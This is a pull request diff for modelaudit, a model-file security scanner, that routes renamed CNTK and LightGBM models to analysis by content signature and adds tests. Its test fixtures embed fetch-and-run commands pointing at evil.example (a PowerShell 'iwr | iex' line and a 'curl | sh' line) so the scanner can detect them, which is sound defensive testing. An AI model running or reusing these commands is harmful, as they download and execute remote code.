### PR TITLE
fix: route renamed CNTK and LightGBM models by content

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -23,6 +23,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - route renamed TensorFlow SavedModel and MetaGraph protobufs through unsafe-operation analysis
 - route renamed ONNX protobuf models with prefixed unknown fields through content analysis and fail closed on unresolved or incomplete structure
 - preserve ambiguous budget-exhausted protobuf candidates for tentative analysis without misclassifying non-ONNX payloads
+- route signature-confirmed CNTK and LightGBM artifacts with misleading filenames through security analysis
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/modelaudit/scanners/cntk_scanner.py
+++ b/modelaudit/scanners/cntk_scanner.py
@@ -15,16 +15,15 @@ from .base import BaseScanner, IssueSeverity, ScanResult
 # 2) CNTKv2 protobuf artifacts include protobuf key markers for "version" and
 #    "uid", typically alongside structure keys like "CompositeFunction" and
 #    "primitive_functions".
-# 3) ".model" is intentionally excluded from v1 scanner ownership because it
-#    overlaps with XGBoost's ".model" extension in this codebase.
+# 3) Strict content markers disambiguate CNTK from formats that share common
+#    extensions such as XGBoost's ".model".
 DISCOVERY_ASSUMPTIONS = [
     "Legacy CNTK marker uses UTF-16LE BCN/BVersion section headers.",
     "CNTKv2 artifacts expose protobuf key markers for version/uid and graph structure fields.",
-    "The .model extension is excluded in v1 to avoid ambiguity with XGBoost .model files.",
+    "Strict content markers permit CNTK ownership independently of a file extension.",
 ]
 
 _CNTK_SUPPORTED_EXTENSIONS = frozenset({".dnn", ".cmf"})
-_CNTK_CANDIDATE_EXTENSIONS = frozenset({".dnn", ".cmf", ".model"})
 
 _MAX_SIGNATURE_BYTES = 4096
 _MAX_SCAN_BYTES = 10 * 1024 * 1024  # 10MB parser budget per file
@@ -124,18 +123,13 @@ def _has_cntkv2_structure_markers(prefix: bytes) -> bool:
     return any(marker in prefix for marker in _CNTK_V2_STRUCTURE_MARKERS)
 
 
-def _detect_cntk_variant(prefix: bytes, extension: str) -> tuple[str, str]:
-    if extension not in _CNTK_CANDIDATE_EXTENSIONS:
-        return "not_cntk", "extension_not_cntk_candidate"
-
+def _detect_cntk_variant(prefix: bytes) -> tuple[str, str]:
     if prefix.startswith(_CNTK_LEGACY_MAGIC):
         if _CNTK_LEGACY_VERSION_MARKER in prefix:
             return "legacy_v1", "legacy_bcn_and_bversion_markers"
         return "unsupported_cntk_variant", "legacy_marker_without_bversion_marker"
 
     if _has_cntkv2_core_markers(prefix):
-        if extension == ".model":
-            return "unsupported_cntk_variant", "cntkv2_model_extension_deferred_v1"
         if _has_cntkv2_structure_markers(prefix):
             return "cntk_v2", "protobuf_core_and_structure_markers"
         return "unsupported_cntk_variant", "protobuf_core_markers_without_structure_markers"
@@ -267,7 +261,7 @@ class CntkScanner(BaseScanner):
     """Scanner for CNTK model files with strict format detection."""
 
     name = "cntk"
-    description = "Scans CNTK .dnn/.cmf model artifacts for load-time execution indicators"
+    description = "Scans signature-confirmed CNTK model artifacts for load-time execution indicators"
     supported_extensions: ClassVar[list[str]] = [".dnn", ".cmf"]
 
     @classmethod
@@ -275,12 +269,8 @@ class CntkScanner(BaseScanner):
         if not os.path.isfile(path):
             return False
 
-        extension = os.path.splitext(path)[1].lower()
-        if extension not in _CNTK_SUPPORTED_EXTENSIONS:
-            return False
-
         prefix = _read_prefix(path)
-        variant, _reason = _detect_cntk_variant(prefix, extension)
+        variant, _reason = _detect_cntk_variant(prefix)
         return variant in {"legacy_v1", "cntk_v2"}
 
     def scan(self, path: str) -> ScanResult:
@@ -297,9 +287,8 @@ class CntkScanner(BaseScanner):
         result.metadata["scan_byte_limit"] = _MAX_SCAN_BYTES
         result.metadata["discovery_assumptions"] = DISCOVERY_ASSUMPTIONS
 
-        extension = os.path.splitext(path)[1].lower()
         signature_prefix = _read_prefix(path)
-        variant, variant_reason = _detect_cntk_variant(signature_prefix, extension)
+        variant, variant_reason = _detect_cntk_variant(signature_prefix)
         result.metadata["cntk_variant"] = variant
         result.metadata["variant_reason"] = variant_reason
         result.metadata["signature_prefix_bytes"] = min(len(signature_prefix), _MAX_SIGNATURE_BYTES)
@@ -310,7 +299,7 @@ class CntkScanner(BaseScanner):
                 passed=False,
                 message=(
                     "Unsupported or out-of-scope CNTK variant detected. "
-                    "Current scanner supports only signature-backed .dnn/.cmf variants."
+                    "Current scanner supports only variants with strict CNTK content signatures."
                 ),
                 severity=IssueSeverity.INFO,
                 location=path,

--- a/modelaudit/scanners/lightgbm_scanner.py
+++ b/modelaudit/scanners/lightgbm_scanner.py
@@ -153,9 +153,6 @@ class LightGBMScanner(BaseScanner):
         if not os.path.isfile(path):
             return False
 
-        if os.path.splitext(path)[1].lower() not in cls.supported_extensions:
-            return False
-
         try:
             with open(path, "rb") as file_obj:
                 preview = file_obj.read(cls._SIGNATURE_READ_BYTES)

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1889,6 +1889,12 @@ def detect_file_format_for_skip_filter(path: str) -> str:
         if format_result != "unknown":
             return format_result
 
+        cntk_probe_size = min(size, _CNTK_SIGNATURE_READ_BYTES)
+        if len(prefix) < cntk_probe_size:
+            prefix += f.read(cntk_probe_size - len(prefix))
+        if _is_cntk_signature(prefix):
+            return "cntk"
+
         lightgbm_probe_size = min(size, _LIGHTGBM_SIGNATURE_READ_BYTES)
         if len(prefix) < lightgbm_probe_size:
             prefix += f.read(lightgbm_probe_size - len(prefix))
@@ -1963,6 +1969,11 @@ def detect_file_format(path: str) -> str:
 
     if magic8.startswith(b"\x93NUMPY"):
         return "numpy"
+
+    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
+
     if _looks_like_onnx_model_candidate_file(file_path, size):
         return "onnx"
     if _looks_like_coreml_model_candidate_file(file_path, size, magic4):
@@ -2032,6 +2043,11 @@ def detect_file_format(path: str) -> str:
     renamed_tensorflow_format = _detect_renamed_tensorflow_protobuf(file_path, size)
     if renamed_tensorflow_format != "unknown":
         return renamed_tensorflow_format
+
+    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    if _is_lightgbm_signature(lightgbm_prefix):
+        return "lightgbm"
+
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size) and detect_format_from_extension(path) in {
         "unknown",
         "protobuf",

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -39,7 +39,8 @@ _TF_METAGRAPH_MIN_BYTES = 8
 _TF_METAGRAPH_MAX_VALIDATE_BYTES = 20 * 1024 * 1024
 _TF_METAGRAPH_MAX_ROUTING_FIELDS = 4096
 _TORCH7_SIGNATURE_READ_BYTES = 4096
-_LIGHTGBM_SIGNATURE_READ_BYTES = 8192
+# Keep content routing aligned with LightGBMScanner._SIGNATURE_READ_BYTES.
+_LIGHTGBM_SIGNATURE_READ_BYTES = 64 * 1024
 _ONNX_MODEL_MAX_ROUTING_FIELDS = 4096
 _ONNX_GRAPH_MAX_ROUTING_FIELDS = 4096
 _ONNX_NODE_MAX_ROUTING_FIELDS = 512
@@ -1771,22 +1772,11 @@ def detect_file_format_from_magic(path: str) -> str:
             if format_result != "unknown":
                 return format_result
 
-            # CNTKv2 has protobuf-style serialization without a fixed first-8-byte magic.
-            # Use bounded signature markers for deterministic identification.
-            f.seek(0)
-            cntk_prefix = f.read(_CNTK_SIGNATURE_READ_BYTES)
-            if _is_cntk_signature(cntk_prefix):
-                return "cntk"
-
             f.seek(0)
             torch7_prefix = f.read(_TORCH7_SIGNATURE_READ_BYTES)
             if _is_torch7_signature(torch7_prefix):
                 return "torch7"
 
-            f.seek(0)
-            lightgbm_prefix = f.read(_LIGHTGBM_SIGNATURE_READ_BYTES)
-            if _is_lightgbm_signature(lightgbm_prefix):
-                return "lightgbm"
             # Protocol 0/1 pickle payloads can evade short magic-byte checks.
             # Probe a bounded prefix and require a valid opcode stream.
             pickle_probe_sample = _read_pickle_probe_sample(file_path, size, magic16)
@@ -1831,6 +1821,13 @@ def detect_file_format_from_magic(path: str) -> str:
         return "coreml"
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size):
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
+
+    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
+    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    if _is_lightgbm_signature(lightgbm_prefix):
+        return "lightgbm"
 
     return "unknown"
 
@@ -1889,18 +1886,6 @@ def detect_file_format_for_skip_filter(path: str) -> str:
         if format_result != "unknown":
             return format_result
 
-        cntk_probe_size = min(size, _CNTK_SIGNATURE_READ_BYTES)
-        if len(prefix) < cntk_probe_size:
-            prefix += f.read(cntk_probe_size - len(prefix))
-        if _is_cntk_signature(prefix):
-            return "cntk"
-
-        lightgbm_probe_size = min(size, _LIGHTGBM_SIGNATURE_READ_BYTES)
-        if len(prefix) < lightgbm_probe_size:
-            prefix += f.read(lightgbm_probe_size - len(prefix))
-        if _is_lightgbm_signature(prefix):
-            return "lightgbm"
-
         if _could_start_proto0_or_1_pickle(prefix):
             max_probe_size = min(size, PROTO0_1_MAX_PROBE_BYTES)
             if len(prefix) < max_probe_size:
@@ -1931,6 +1916,13 @@ def detect_file_format_for_skip_filter(path: str) -> str:
         return "coreml"
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size):
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
+
+    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
+    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    if _is_lightgbm_signature(lightgbm_prefix):
+        return "lightgbm"
 
     return "unknown"
 
@@ -1969,10 +1961,6 @@ def detect_file_format(path: str) -> str:
 
     if magic8.startswith(b"\x93NUMPY"):
         return "numpy"
-
-    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
-    if _is_cntk_signature(cntk_prefix):
-        return "cntk"
 
     if _looks_like_onnx_model_candidate_file(file_path, size):
         return "onnx"
@@ -2044,15 +2032,18 @@ def detect_file_format(path: str) -> str:
     if renamed_tensorflow_format != "unknown":
         return renamed_tensorflow_format
 
-    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
-    if _is_lightgbm_signature(lightgbm_prefix):
-        return "lightgbm"
-
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size) and detect_format_from_extension(path) in {
         "unknown",
         "protobuf",
     }:
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
+
+    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
+    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    if _is_lightgbm_signature(lightgbm_prefix):
+        return "lightgbm"
 
     # For .bin files, do more sophisticated detection
     if ext == ".bin":

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1819,13 +1819,20 @@ def detect_file_format_from_magic(path: str) -> str:
         return "onnx"
     if _looks_like_coreml_model_candidate_file(file_path, size, magic4):
         return "coreml"
+
+    try:
+        cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    except OSError:
+        return "unknown"
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size):
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
 
-    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
-    if _is_cntk_signature(cntk_prefix):
-        return "cntk"
-    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    try:
+        lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
+    except OSError:
+        return "unknown"
     if _is_lightgbm_signature(lightgbm_prefix):
         return "lightgbm"
 
@@ -1907,6 +1914,10 @@ def detect_file_format_for_skip_filter(path: str) -> str:
             if xml_format != "unknown":
                 return xml_format
 
+        content_probe_size = min(size, max(_CNTK_SIGNATURE_READ_BYTES, _LIGHTGBM_SIGNATURE_READ_BYTES))
+        if len(prefix) < content_probe_size:
+            prefix += f.read(content_probe_size - len(prefix))
+
     renamed_tensorflow_format = _detect_renamed_tensorflow_protobuf(file_path, size)
     if renamed_tensorflow_format != "unknown":
         return renamed_tensorflow_format
@@ -1914,14 +1925,12 @@ def detect_file_format_for_skip_filter(path: str) -> str:
         return "onnx"
     if _looks_like_coreml_model_candidate_file(file_path, size, magic4):
         return "coreml"
+
+    if _is_cntk_signature(prefix[:_CNTK_SIGNATURE_READ_BYTES]):
+        return "cntk"
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size):
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
-
-    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
-    if _is_cntk_signature(cntk_prefix):
-        return "cntk"
-    lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
-    if _is_lightgbm_signature(lightgbm_prefix):
+    if _is_lightgbm_signature(prefix[:_LIGHTGBM_SIGNATURE_READ_BYTES]):
         return "lightgbm"
 
     return "unknown"
@@ -2032,15 +2041,14 @@ def detect_file_format(path: str) -> str:
     if renamed_tensorflow_format != "unknown":
         return renamed_tensorflow_format
 
+    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
+    if _is_cntk_signature(cntk_prefix):
+        return "cntk"
     if _has_budget_exhausted_protobuf_model_candidate(file_path, size) and detect_format_from_extension(path) in {
         "unknown",
         "protobuf",
     }:
         return PROTOBUF_MODEL_CANDIDATE_FORMAT
-
-    cntk_prefix = read_magic_bytes(path, _CNTK_SIGNATURE_READ_BYTES)
-    if _is_cntk_signature(cntk_prefix):
-        return "cntk"
     lightgbm_prefix = read_magic_bytes(path, _LIGHTGBM_SIGNATURE_READ_BYTES)
     if _is_lightgbm_signature(lightgbm_prefix):
         return "lightgbm"

--- a/tests/scanners/test_cntk_scanner.py
+++ b/tests/scanners/test_cntk_scanner.py
@@ -35,9 +35,17 @@ def test_cntk_scanner_rejects_misnamed_non_cntk_file(tmp_path: Path) -> None:
     assert not CntkScanner.can_handle(str(path))
 
 
-def test_cntk_scanner_rejects_model_extension_in_v1_scope(tmp_path: Path) -> None:
-    path = tmp_path / "deferred.model"
+@pytest.mark.parametrize("filename", ["graph.model", "renamed.jpg"])
+def test_cntk_scanner_handles_strict_signature_independently_of_suffix(tmp_path: Path, filename: str) -> None:
+    path = tmp_path / filename
     _write_cntkv2(path, payload=b"inputs outputs")
+    assert CntkScanner.can_handle(str(path))
+
+
+def test_cntk_scanner_rejects_renamed_structure_near_match(tmp_path: Path) -> None:
+    path = tmp_path / "near-match.jpg"
+    _write_cntkv2(path, payload=b"inputs outputs", include_structure=False)
+
     assert not CntkScanner.can_handle(str(path))
 
 

--- a/tests/scanners/test_lightgbm_scanner.py
+++ b/tests/scanners/test_lightgbm_scanner.py
@@ -54,8 +54,15 @@ def test_can_handle_lightgbm_binary_like_model(tmp_path: Path) -> None:
     assert LightGBMScanner.can_handle(str(path))
 
 
+def test_can_handle_renamed_lightgbm_model_by_strict_content(tmp_path: Path) -> None:
+    path = tmp_path / "payload.jpg"
+    path.write_text(_build_lightgbm_text(), encoding="utf-8")
+
+    assert LightGBMScanner.can_handle(str(path))
+
+
 def test_can_handle_rejects_xgboost_like_model_content(tmp_path: Path) -> None:
-    path = tmp_path / "xgb.model"
+    path = tmp_path / "xgb.jpg"
     path.write_text('{"learner":{"gradient_booster":{"name":"gbtree","tree_param":{}}}}', encoding="utf-8")
 
     assert not LightGBMScanner.can_handle(str(path))

--- a/tests/scanners/test_zip_scanner.py
+++ b/tests/scanners/test_zip_scanner.py
@@ -36,6 +36,25 @@ def _npy_payload() -> bytes:
     return payload.getvalue()
 
 
+def _malicious_cntkv2_payload() -> bytes:
+    prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab"
+    return (
+        prefix
+        + b" CompositeFunction primitive_functions native_user_function loadlibrary C:\\temp\\evil.dll "
+        + b"powershell -c iwr http://evil.example/p.ps1 | iex base64.b64decode("
+        + (b"A" * 96)
+        + b") exec(payload) "
+    )
+
+
+def _malicious_lightgbm_payload() -> bytes:
+    return (
+        b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n"
+        b"feature_names=f0 f1\ntree_sizes=12\nTree=0\nnum_leaves=2\nsplit_feature=0\n"
+        b"leaf_value=0.1 0.2\nmetadata=os.system('curl https://evil.example/p.sh | sh')\n"
+    )
+
+
 def test_rewrite_extracted_member_location_preserves_scanner_specific_suffix_policy() -> None:
     assert (
         rewrite_extracted_member_location(
@@ -1690,6 +1709,48 @@ class TestZipScanner:
             entry["path"] == f"{archive_path}:model.payload" and entry["type"] == "onnx"
             for entry in result.metadata["contents"]
         )
+
+    @pytest.mark.parametrize(
+        ("scanner_name", "payload"),
+        [("cntk", _malicious_cntkv2_payload()), ("lightgbm", _malicious_lightgbm_payload())],
+    )
+    def test_nested_member_routes_renamed_strict_signature_payload(
+        self,
+        tmp_path: Path,
+        scanner_name: str,
+        payload: bytes,
+    ) -> None:
+        archive_path = tmp_path / "outer.zip"
+        with zipfile.ZipFile(archive_path, "w") as archive:
+            archive.writestr(f"{scanner_name}.jpg", payload)
+
+        result = self.scanner.scan(str(archive_path))
+
+        assert any(
+            entry["path"] == f"{archive_path}:{scanner_name}.jpg" and entry["type"] == scanner_name
+            for entry in result.metadata["contents"]
+        )
+        assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
+
+    @pytest.mark.parametrize(
+        "payload",
+        [
+            b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab inputs",
+            b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n",
+        ],
+    )
+    def test_nested_member_rejects_renamed_signature_near_match(self, tmp_path: Path, payload: bytes) -> None:
+        archive_path = tmp_path / "outer.zip"
+        with zipfile.ZipFile(archive_path, "w") as archive:
+            archive.writestr("near-match.jpg", payload)
+
+        result = self.scanner.scan(str(archive_path))
+
+        assert any(
+            entry["path"] == f"{archive_path}:near-match.jpg" and entry["type"] == "unknown"
+            for entry in result.metadata["contents"]
+        )
+        assert not any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
 
     def test_nested_member_routes_prefixed_misnamed_onnx_by_structure(self, tmp_path: Path) -> None:
         """Unknown leading protobuf content must not hide a nested ONNX member."""

--- a/tests/test_core.py
+++ b/tests/test_core.py
@@ -74,6 +74,25 @@ def _build_malicious_tf_savedmodel() -> bytes:
     return cast(bytes, saved_model.SerializeToString())
 
 
+def _build_malicious_cntkv2() -> bytes:
+    prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab"
+    return (
+        prefix
+        + b" CompositeFunction primitive_functions native_user_function loadlibrary C:\\temp\\evil.dll "
+        + b"powershell -c iwr http://evil.example/p.ps1 | iex base64.b64decode("
+        + (b"A" * 96)
+        + b") exec(payload) "
+    )
+
+
+def _build_malicious_lightgbm() -> bytes:
+    return (
+        b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n"
+        b"feature_names=f0 f1\ntree_sizes=12\nTree=0\nnum_leaves=2\nsplit_feature=0\n"
+        b"leaf_value=0.1 0.2\nmetadata=os.system('curl https://evil.example/p.sh | sh')\n"
+    )
+
+
 def _create_misnamed_zip(path: Path, entries: dict[str, bytes]) -> None:
     """Write a ZIP archive at an intentionally misleading file path."""
     with zipfile.ZipFile(path, "w") as archive:
@@ -1838,6 +1857,24 @@ def test_scan_file_routes_misnamed_coreml_and_detects_custom_layer(tmp_path: Pat
         issue.severity == IssueSeverity.CRITICAL and "Custom CoreML layer detected" in issue.message
         for issue in result.issues
     )
+
+
+@pytest.mark.parametrize(
+    ("scanner_name", "payload"),
+    [("cntk", _build_malicious_cntkv2()), ("lightgbm", _build_malicious_lightgbm())],
+)
+def test_scan_file_detects_malicious_renamed_signature_backed_models(
+    tmp_path: Path,
+    scanner_name: str,
+    payload: bytes,
+) -> None:
+    disguised_model = tmp_path / f"{scanner_name}.jpg"
+    disguised_model.write_bytes(payload)
+
+    result = scan_file(str(disguised_model), config={"cache_scan_results": False})
+
+    assert result.scanner_name == scanner_name
+    assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues)
 
 
 @pytest.mark.parametrize(

--- a/tests/test_directory_file_filtering.py
+++ b/tests/test_directory_file_filtering.py
@@ -45,6 +45,25 @@ def _build_malicious_tf_savedmodel() -> bytes:
     return cast(bytes, saved_model.SerializeToString())
 
 
+def _build_malicious_cntkv2() -> bytes:
+    prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab"
+    return (
+        prefix
+        + b" CompositeFunction primitive_functions native_user_function loadlibrary C:\\temp\\evil.dll "
+        + b"powershell -c iwr http://evil.example/p.ps1 | iex base64.b64decode("
+        + (b"A" * 96)
+        + b") exec(payload) "
+    )
+
+
+def _build_malicious_lightgbm() -> bytes:
+    return (
+        b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n"
+        b"feature_names=f0 f1\ntree_sizes=12\nTree=0\nnum_leaves=2\nsplit_feature=0\n"
+        b"leaf_value=0.1 0.2\nmetadata=os.system('curl https://evil.example/p.sh | sh')\n"
+    )
+
+
 def _corrupt_zip_member_crc(path: Path, member_name: str) -> None:
     """Patch a ZIP member CRC so full scanning sees a malformed entry."""
     with zipfile.ZipFile(path) as archive:
@@ -341,6 +360,42 @@ class TestDirectoryFileFiltering:
         results = scan_model_directory_or_file(str(tmp_path))
 
         assert results["files_scanned"] == 0
+
+    @pytest.mark.parametrize(
+        ("scanner_name", "payload"),
+        [("cntk", _build_malicious_cntkv2()), ("lightgbm", _build_malicious_lightgbm())],
+    )
+    def test_disguised_signature_backed_malicious_model_is_scanned(
+        self,
+        tmp_path: Path,
+        scanner_name: str,
+        payload: bytes,
+    ) -> None:
+        disguised_model = tmp_path / f"{scanner_name}.jpg"
+        disguised_model.write_bytes(payload)
+
+        results = scan_model_directory_or_file(str(tmp_path), cache_scan_results=False)
+
+        assert results["files_scanned"] == 1
+        assert scanner_name in results.scanner_names
+        assert determine_exit_code(results) == 1
+        assert any(issue.severity.value == "critical" for issue in results.issues)
+
+    @pytest.mark.parametrize(
+        "payload",
+        [
+            b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab inputs",
+            b"tree\nversion=v4\nnum_class=1\nnum_tree_per_iteration=1\nmax_feature_idx=2\n",
+        ],
+    )
+    def test_disguised_signature_near_match_remains_skipped(self, tmp_path: Path, payload: bytes) -> None:
+        near_match = tmp_path / "near-match.jpg"
+        near_match.write_bytes(payload)
+
+        results = scan_model_directory_or_file(str(tmp_path), cache_scan_results=False)
+
+        assert results["files_scanned"] == 0
+        assert results.issues == []
 
     def test_disguised_malicious_coreml_with_skipped_extension_is_scanned(self, tmp_path: Path) -> None:
         """Directory scans should preserve structurally recognized renamed CoreML payloads."""

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -71,6 +71,19 @@ def _build_tf_savedmodel_bytes() -> bytes:
     return cast(bytes, saved_model.SerializeToString())
 
 
+def _build_cntkv2_bytes(*, include_structure: bool = True) -> bytes:
+    prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab"
+    structure = b" CompositeFunction primitive_functions " if include_structure else b""
+    return prefix + structure + b" inputs outputs "
+
+
+def _build_lightgbm_text(*, include_tree_details: bool = True) -> bytes:
+    lines = ["tree", "version=v4", "num_class=1", "num_tree_per_iteration=1", "max_feature_idx=2"]
+    if include_tree_details:
+        lines.extend(["Tree=0", "num_leaves=2", "split_feature=0", "leaf_value=0.1 0.2"])
+    return ("\n".join(lines) + "\n").encode()
+
+
 def test_detect_file_format_directory(tmp_path):
     """Test detecting a directory format."""
     # Create a regular directory
@@ -277,6 +290,36 @@ def test_detect_file_format_routes_renamed_coreml_structure_and_rejects_near_mat
         assert detect_file_format(str(rejected_path)) == "unknown"
         assert detect_file_format_from_magic(str(rejected_path)) == "unknown"
         assert detect_file_format_for_skip_filter(str(rejected_path)) == "unknown"
+
+
+@pytest.mark.parametrize(
+    ("format_name", "payload"),
+    [("cntk", _build_cntkv2_bytes()), ("lightgbm", _build_lightgbm_text())],
+)
+def test_detect_file_format_routes_renamed_strict_signature_formats(
+    tmp_path: Path,
+    format_name: str,
+    payload: bytes,
+) -> None:
+    model_path = tmp_path / f"{format_name}.jpg"
+    model_path.write_bytes(payload)
+
+    assert detect_file_format_from_magic(str(model_path)) == format_name
+    assert detect_file_format_for_skip_filter(str(model_path)) == format_name
+    assert detect_file_format(str(model_path)) == format_name
+
+
+@pytest.mark.parametrize(
+    "payload",
+    [_build_cntkv2_bytes(include_structure=False), _build_lightgbm_text(include_tree_details=False)],
+)
+def test_detect_file_format_rejects_renamed_signature_near_matches(tmp_path: Path, payload: bytes) -> None:
+    model_path = tmp_path / "near-match.jpg"
+    model_path.write_bytes(payload)
+
+    assert detect_file_format_from_magic(str(model_path)) == "unknown"
+    assert detect_file_format_for_skip_filter(str(model_path)) == "unknown"
+    assert detect_file_format(str(model_path)) == "unknown"
 
 
 @pytest.mark.parametrize(

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -77,8 +77,10 @@ def _build_cntkv2_bytes(*, include_structure: bool = True) -> bytes:
     return prefix + structure + b" inputs outputs "
 
 
-def _build_lightgbm_text(*, include_tree_details: bool = True) -> bytes:
+def _build_lightgbm_text(*, include_tree_details: bool = True, feature_name_padding: int = 0) -> bytes:
     lines = ["tree", "version=v4", "num_class=1", "num_tree_per_iteration=1", "max_feature_idx=2"]
+    if feature_name_padding:
+        lines.append("feature_names=" + ("f" * feature_name_padding))
     if include_tree_details:
         lines.extend(["Tree=0", "num_leaves=2", "split_feature=0", "leaf_value=0.1 0.2"])
     return ("\n".join(lines) + "\n").encode()
@@ -307,6 +309,36 @@ def test_detect_file_format_routes_renamed_strict_signature_formats(
     assert detect_file_format_from_magic(str(model_path)) == format_name
     assert detect_file_format_for_skip_filter(str(model_path)) == format_name
     assert detect_file_format(str(model_path)) == format_name
+
+
+def test_detect_file_format_keeps_zip_container_ownership_over_embedded_cntk_markers(tmp_path: Path) -> None:
+    archive_path = tmp_path / "cntk-looking.jpg"
+    with zipfile.ZipFile(archive_path, "w", compression=zipfile.ZIP_STORED) as archive:
+        archive.writestr("markers.bin", _build_cntkv2_bytes())
+
+    assert detect_file_format_from_magic(str(archive_path)) == "zip"
+    assert detect_file_format_for_skip_filter(str(archive_path)) == "zip"
+    assert detect_file_format(str(archive_path)) == "zip"
+
+
+def test_detect_file_format_keeps_coreml_ownership_over_embedded_cntk_markers(tmp_path: Path) -> None:
+    model_path = create_mock_coreml(
+        tmp_path / "cntk-looking.jpg",
+        custom_class="\n\x07version\n\x03uid CompositeFunction primitive_functions",
+    )
+
+    assert detect_file_format_from_magic(str(model_path)) == "coreml"
+    assert detect_file_format_for_skip_filter(str(model_path)) == "coreml"
+    assert detect_file_format(str(model_path)) == "coreml"
+
+
+def test_detect_file_format_routes_renamed_lightgbm_with_large_pre_tree_header(tmp_path: Path) -> None:
+    model_path = tmp_path / "large-header.jpg"
+    model_path.write_bytes(_build_lightgbm_text(feature_name_padding=10 * 1024))
+
+    assert detect_file_format_from_magic(str(model_path)) == "lightgbm"
+    assert detect_file_format_for_skip_filter(str(model_path)) == "lightgbm"
+    assert detect_file_format(str(model_path)) == "lightgbm"
 
 
 @pytest.mark.parametrize(

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -341,6 +341,18 @@ def test_detect_file_format_routes_renamed_lightgbm_with_large_pre_tree_header(t
     assert detect_file_format(str(model_path)) == "lightgbm"
 
 
+def test_detect_file_format_prioritizes_cntk_over_budget_exhausted_protobuf_candidate(tmp_path: Path) -> None:
+    model_path = tmp_path / "protobuf-looking-cntk.jpg"
+    cntk_markers = _build_cntkv2_bytes()
+    model_path.write_bytes(
+        b"\xa2\x06" + bytes([len(cntk_markers)]) + cntk_markers + (b"\x08\x01" * 4097),
+    )
+
+    assert detect_file_format_from_magic(str(model_path)) == "cntk"
+    assert detect_file_format_for_skip_filter(str(model_path)) == "cntk"
+    assert detect_file_format(str(model_path)) == "cntk"
+
+
 @pytest.mark.parametrize(
     "payload",
     [_build_cntkv2_bytes(include_structure=False), _build_lightgbm_text(include_tree_details=False)],


### PR DESCRIPTION
## Summary

- route signature-confirmed CNTK artifacts through the CNTK scanner regardless of a misleading filename, including `.model` and skipped suffixes such as `.jpg`
- route signature-confirmed LightGBM artifacts through full analysis regardless of filename while retaining strict XGBoost and near-match rejection
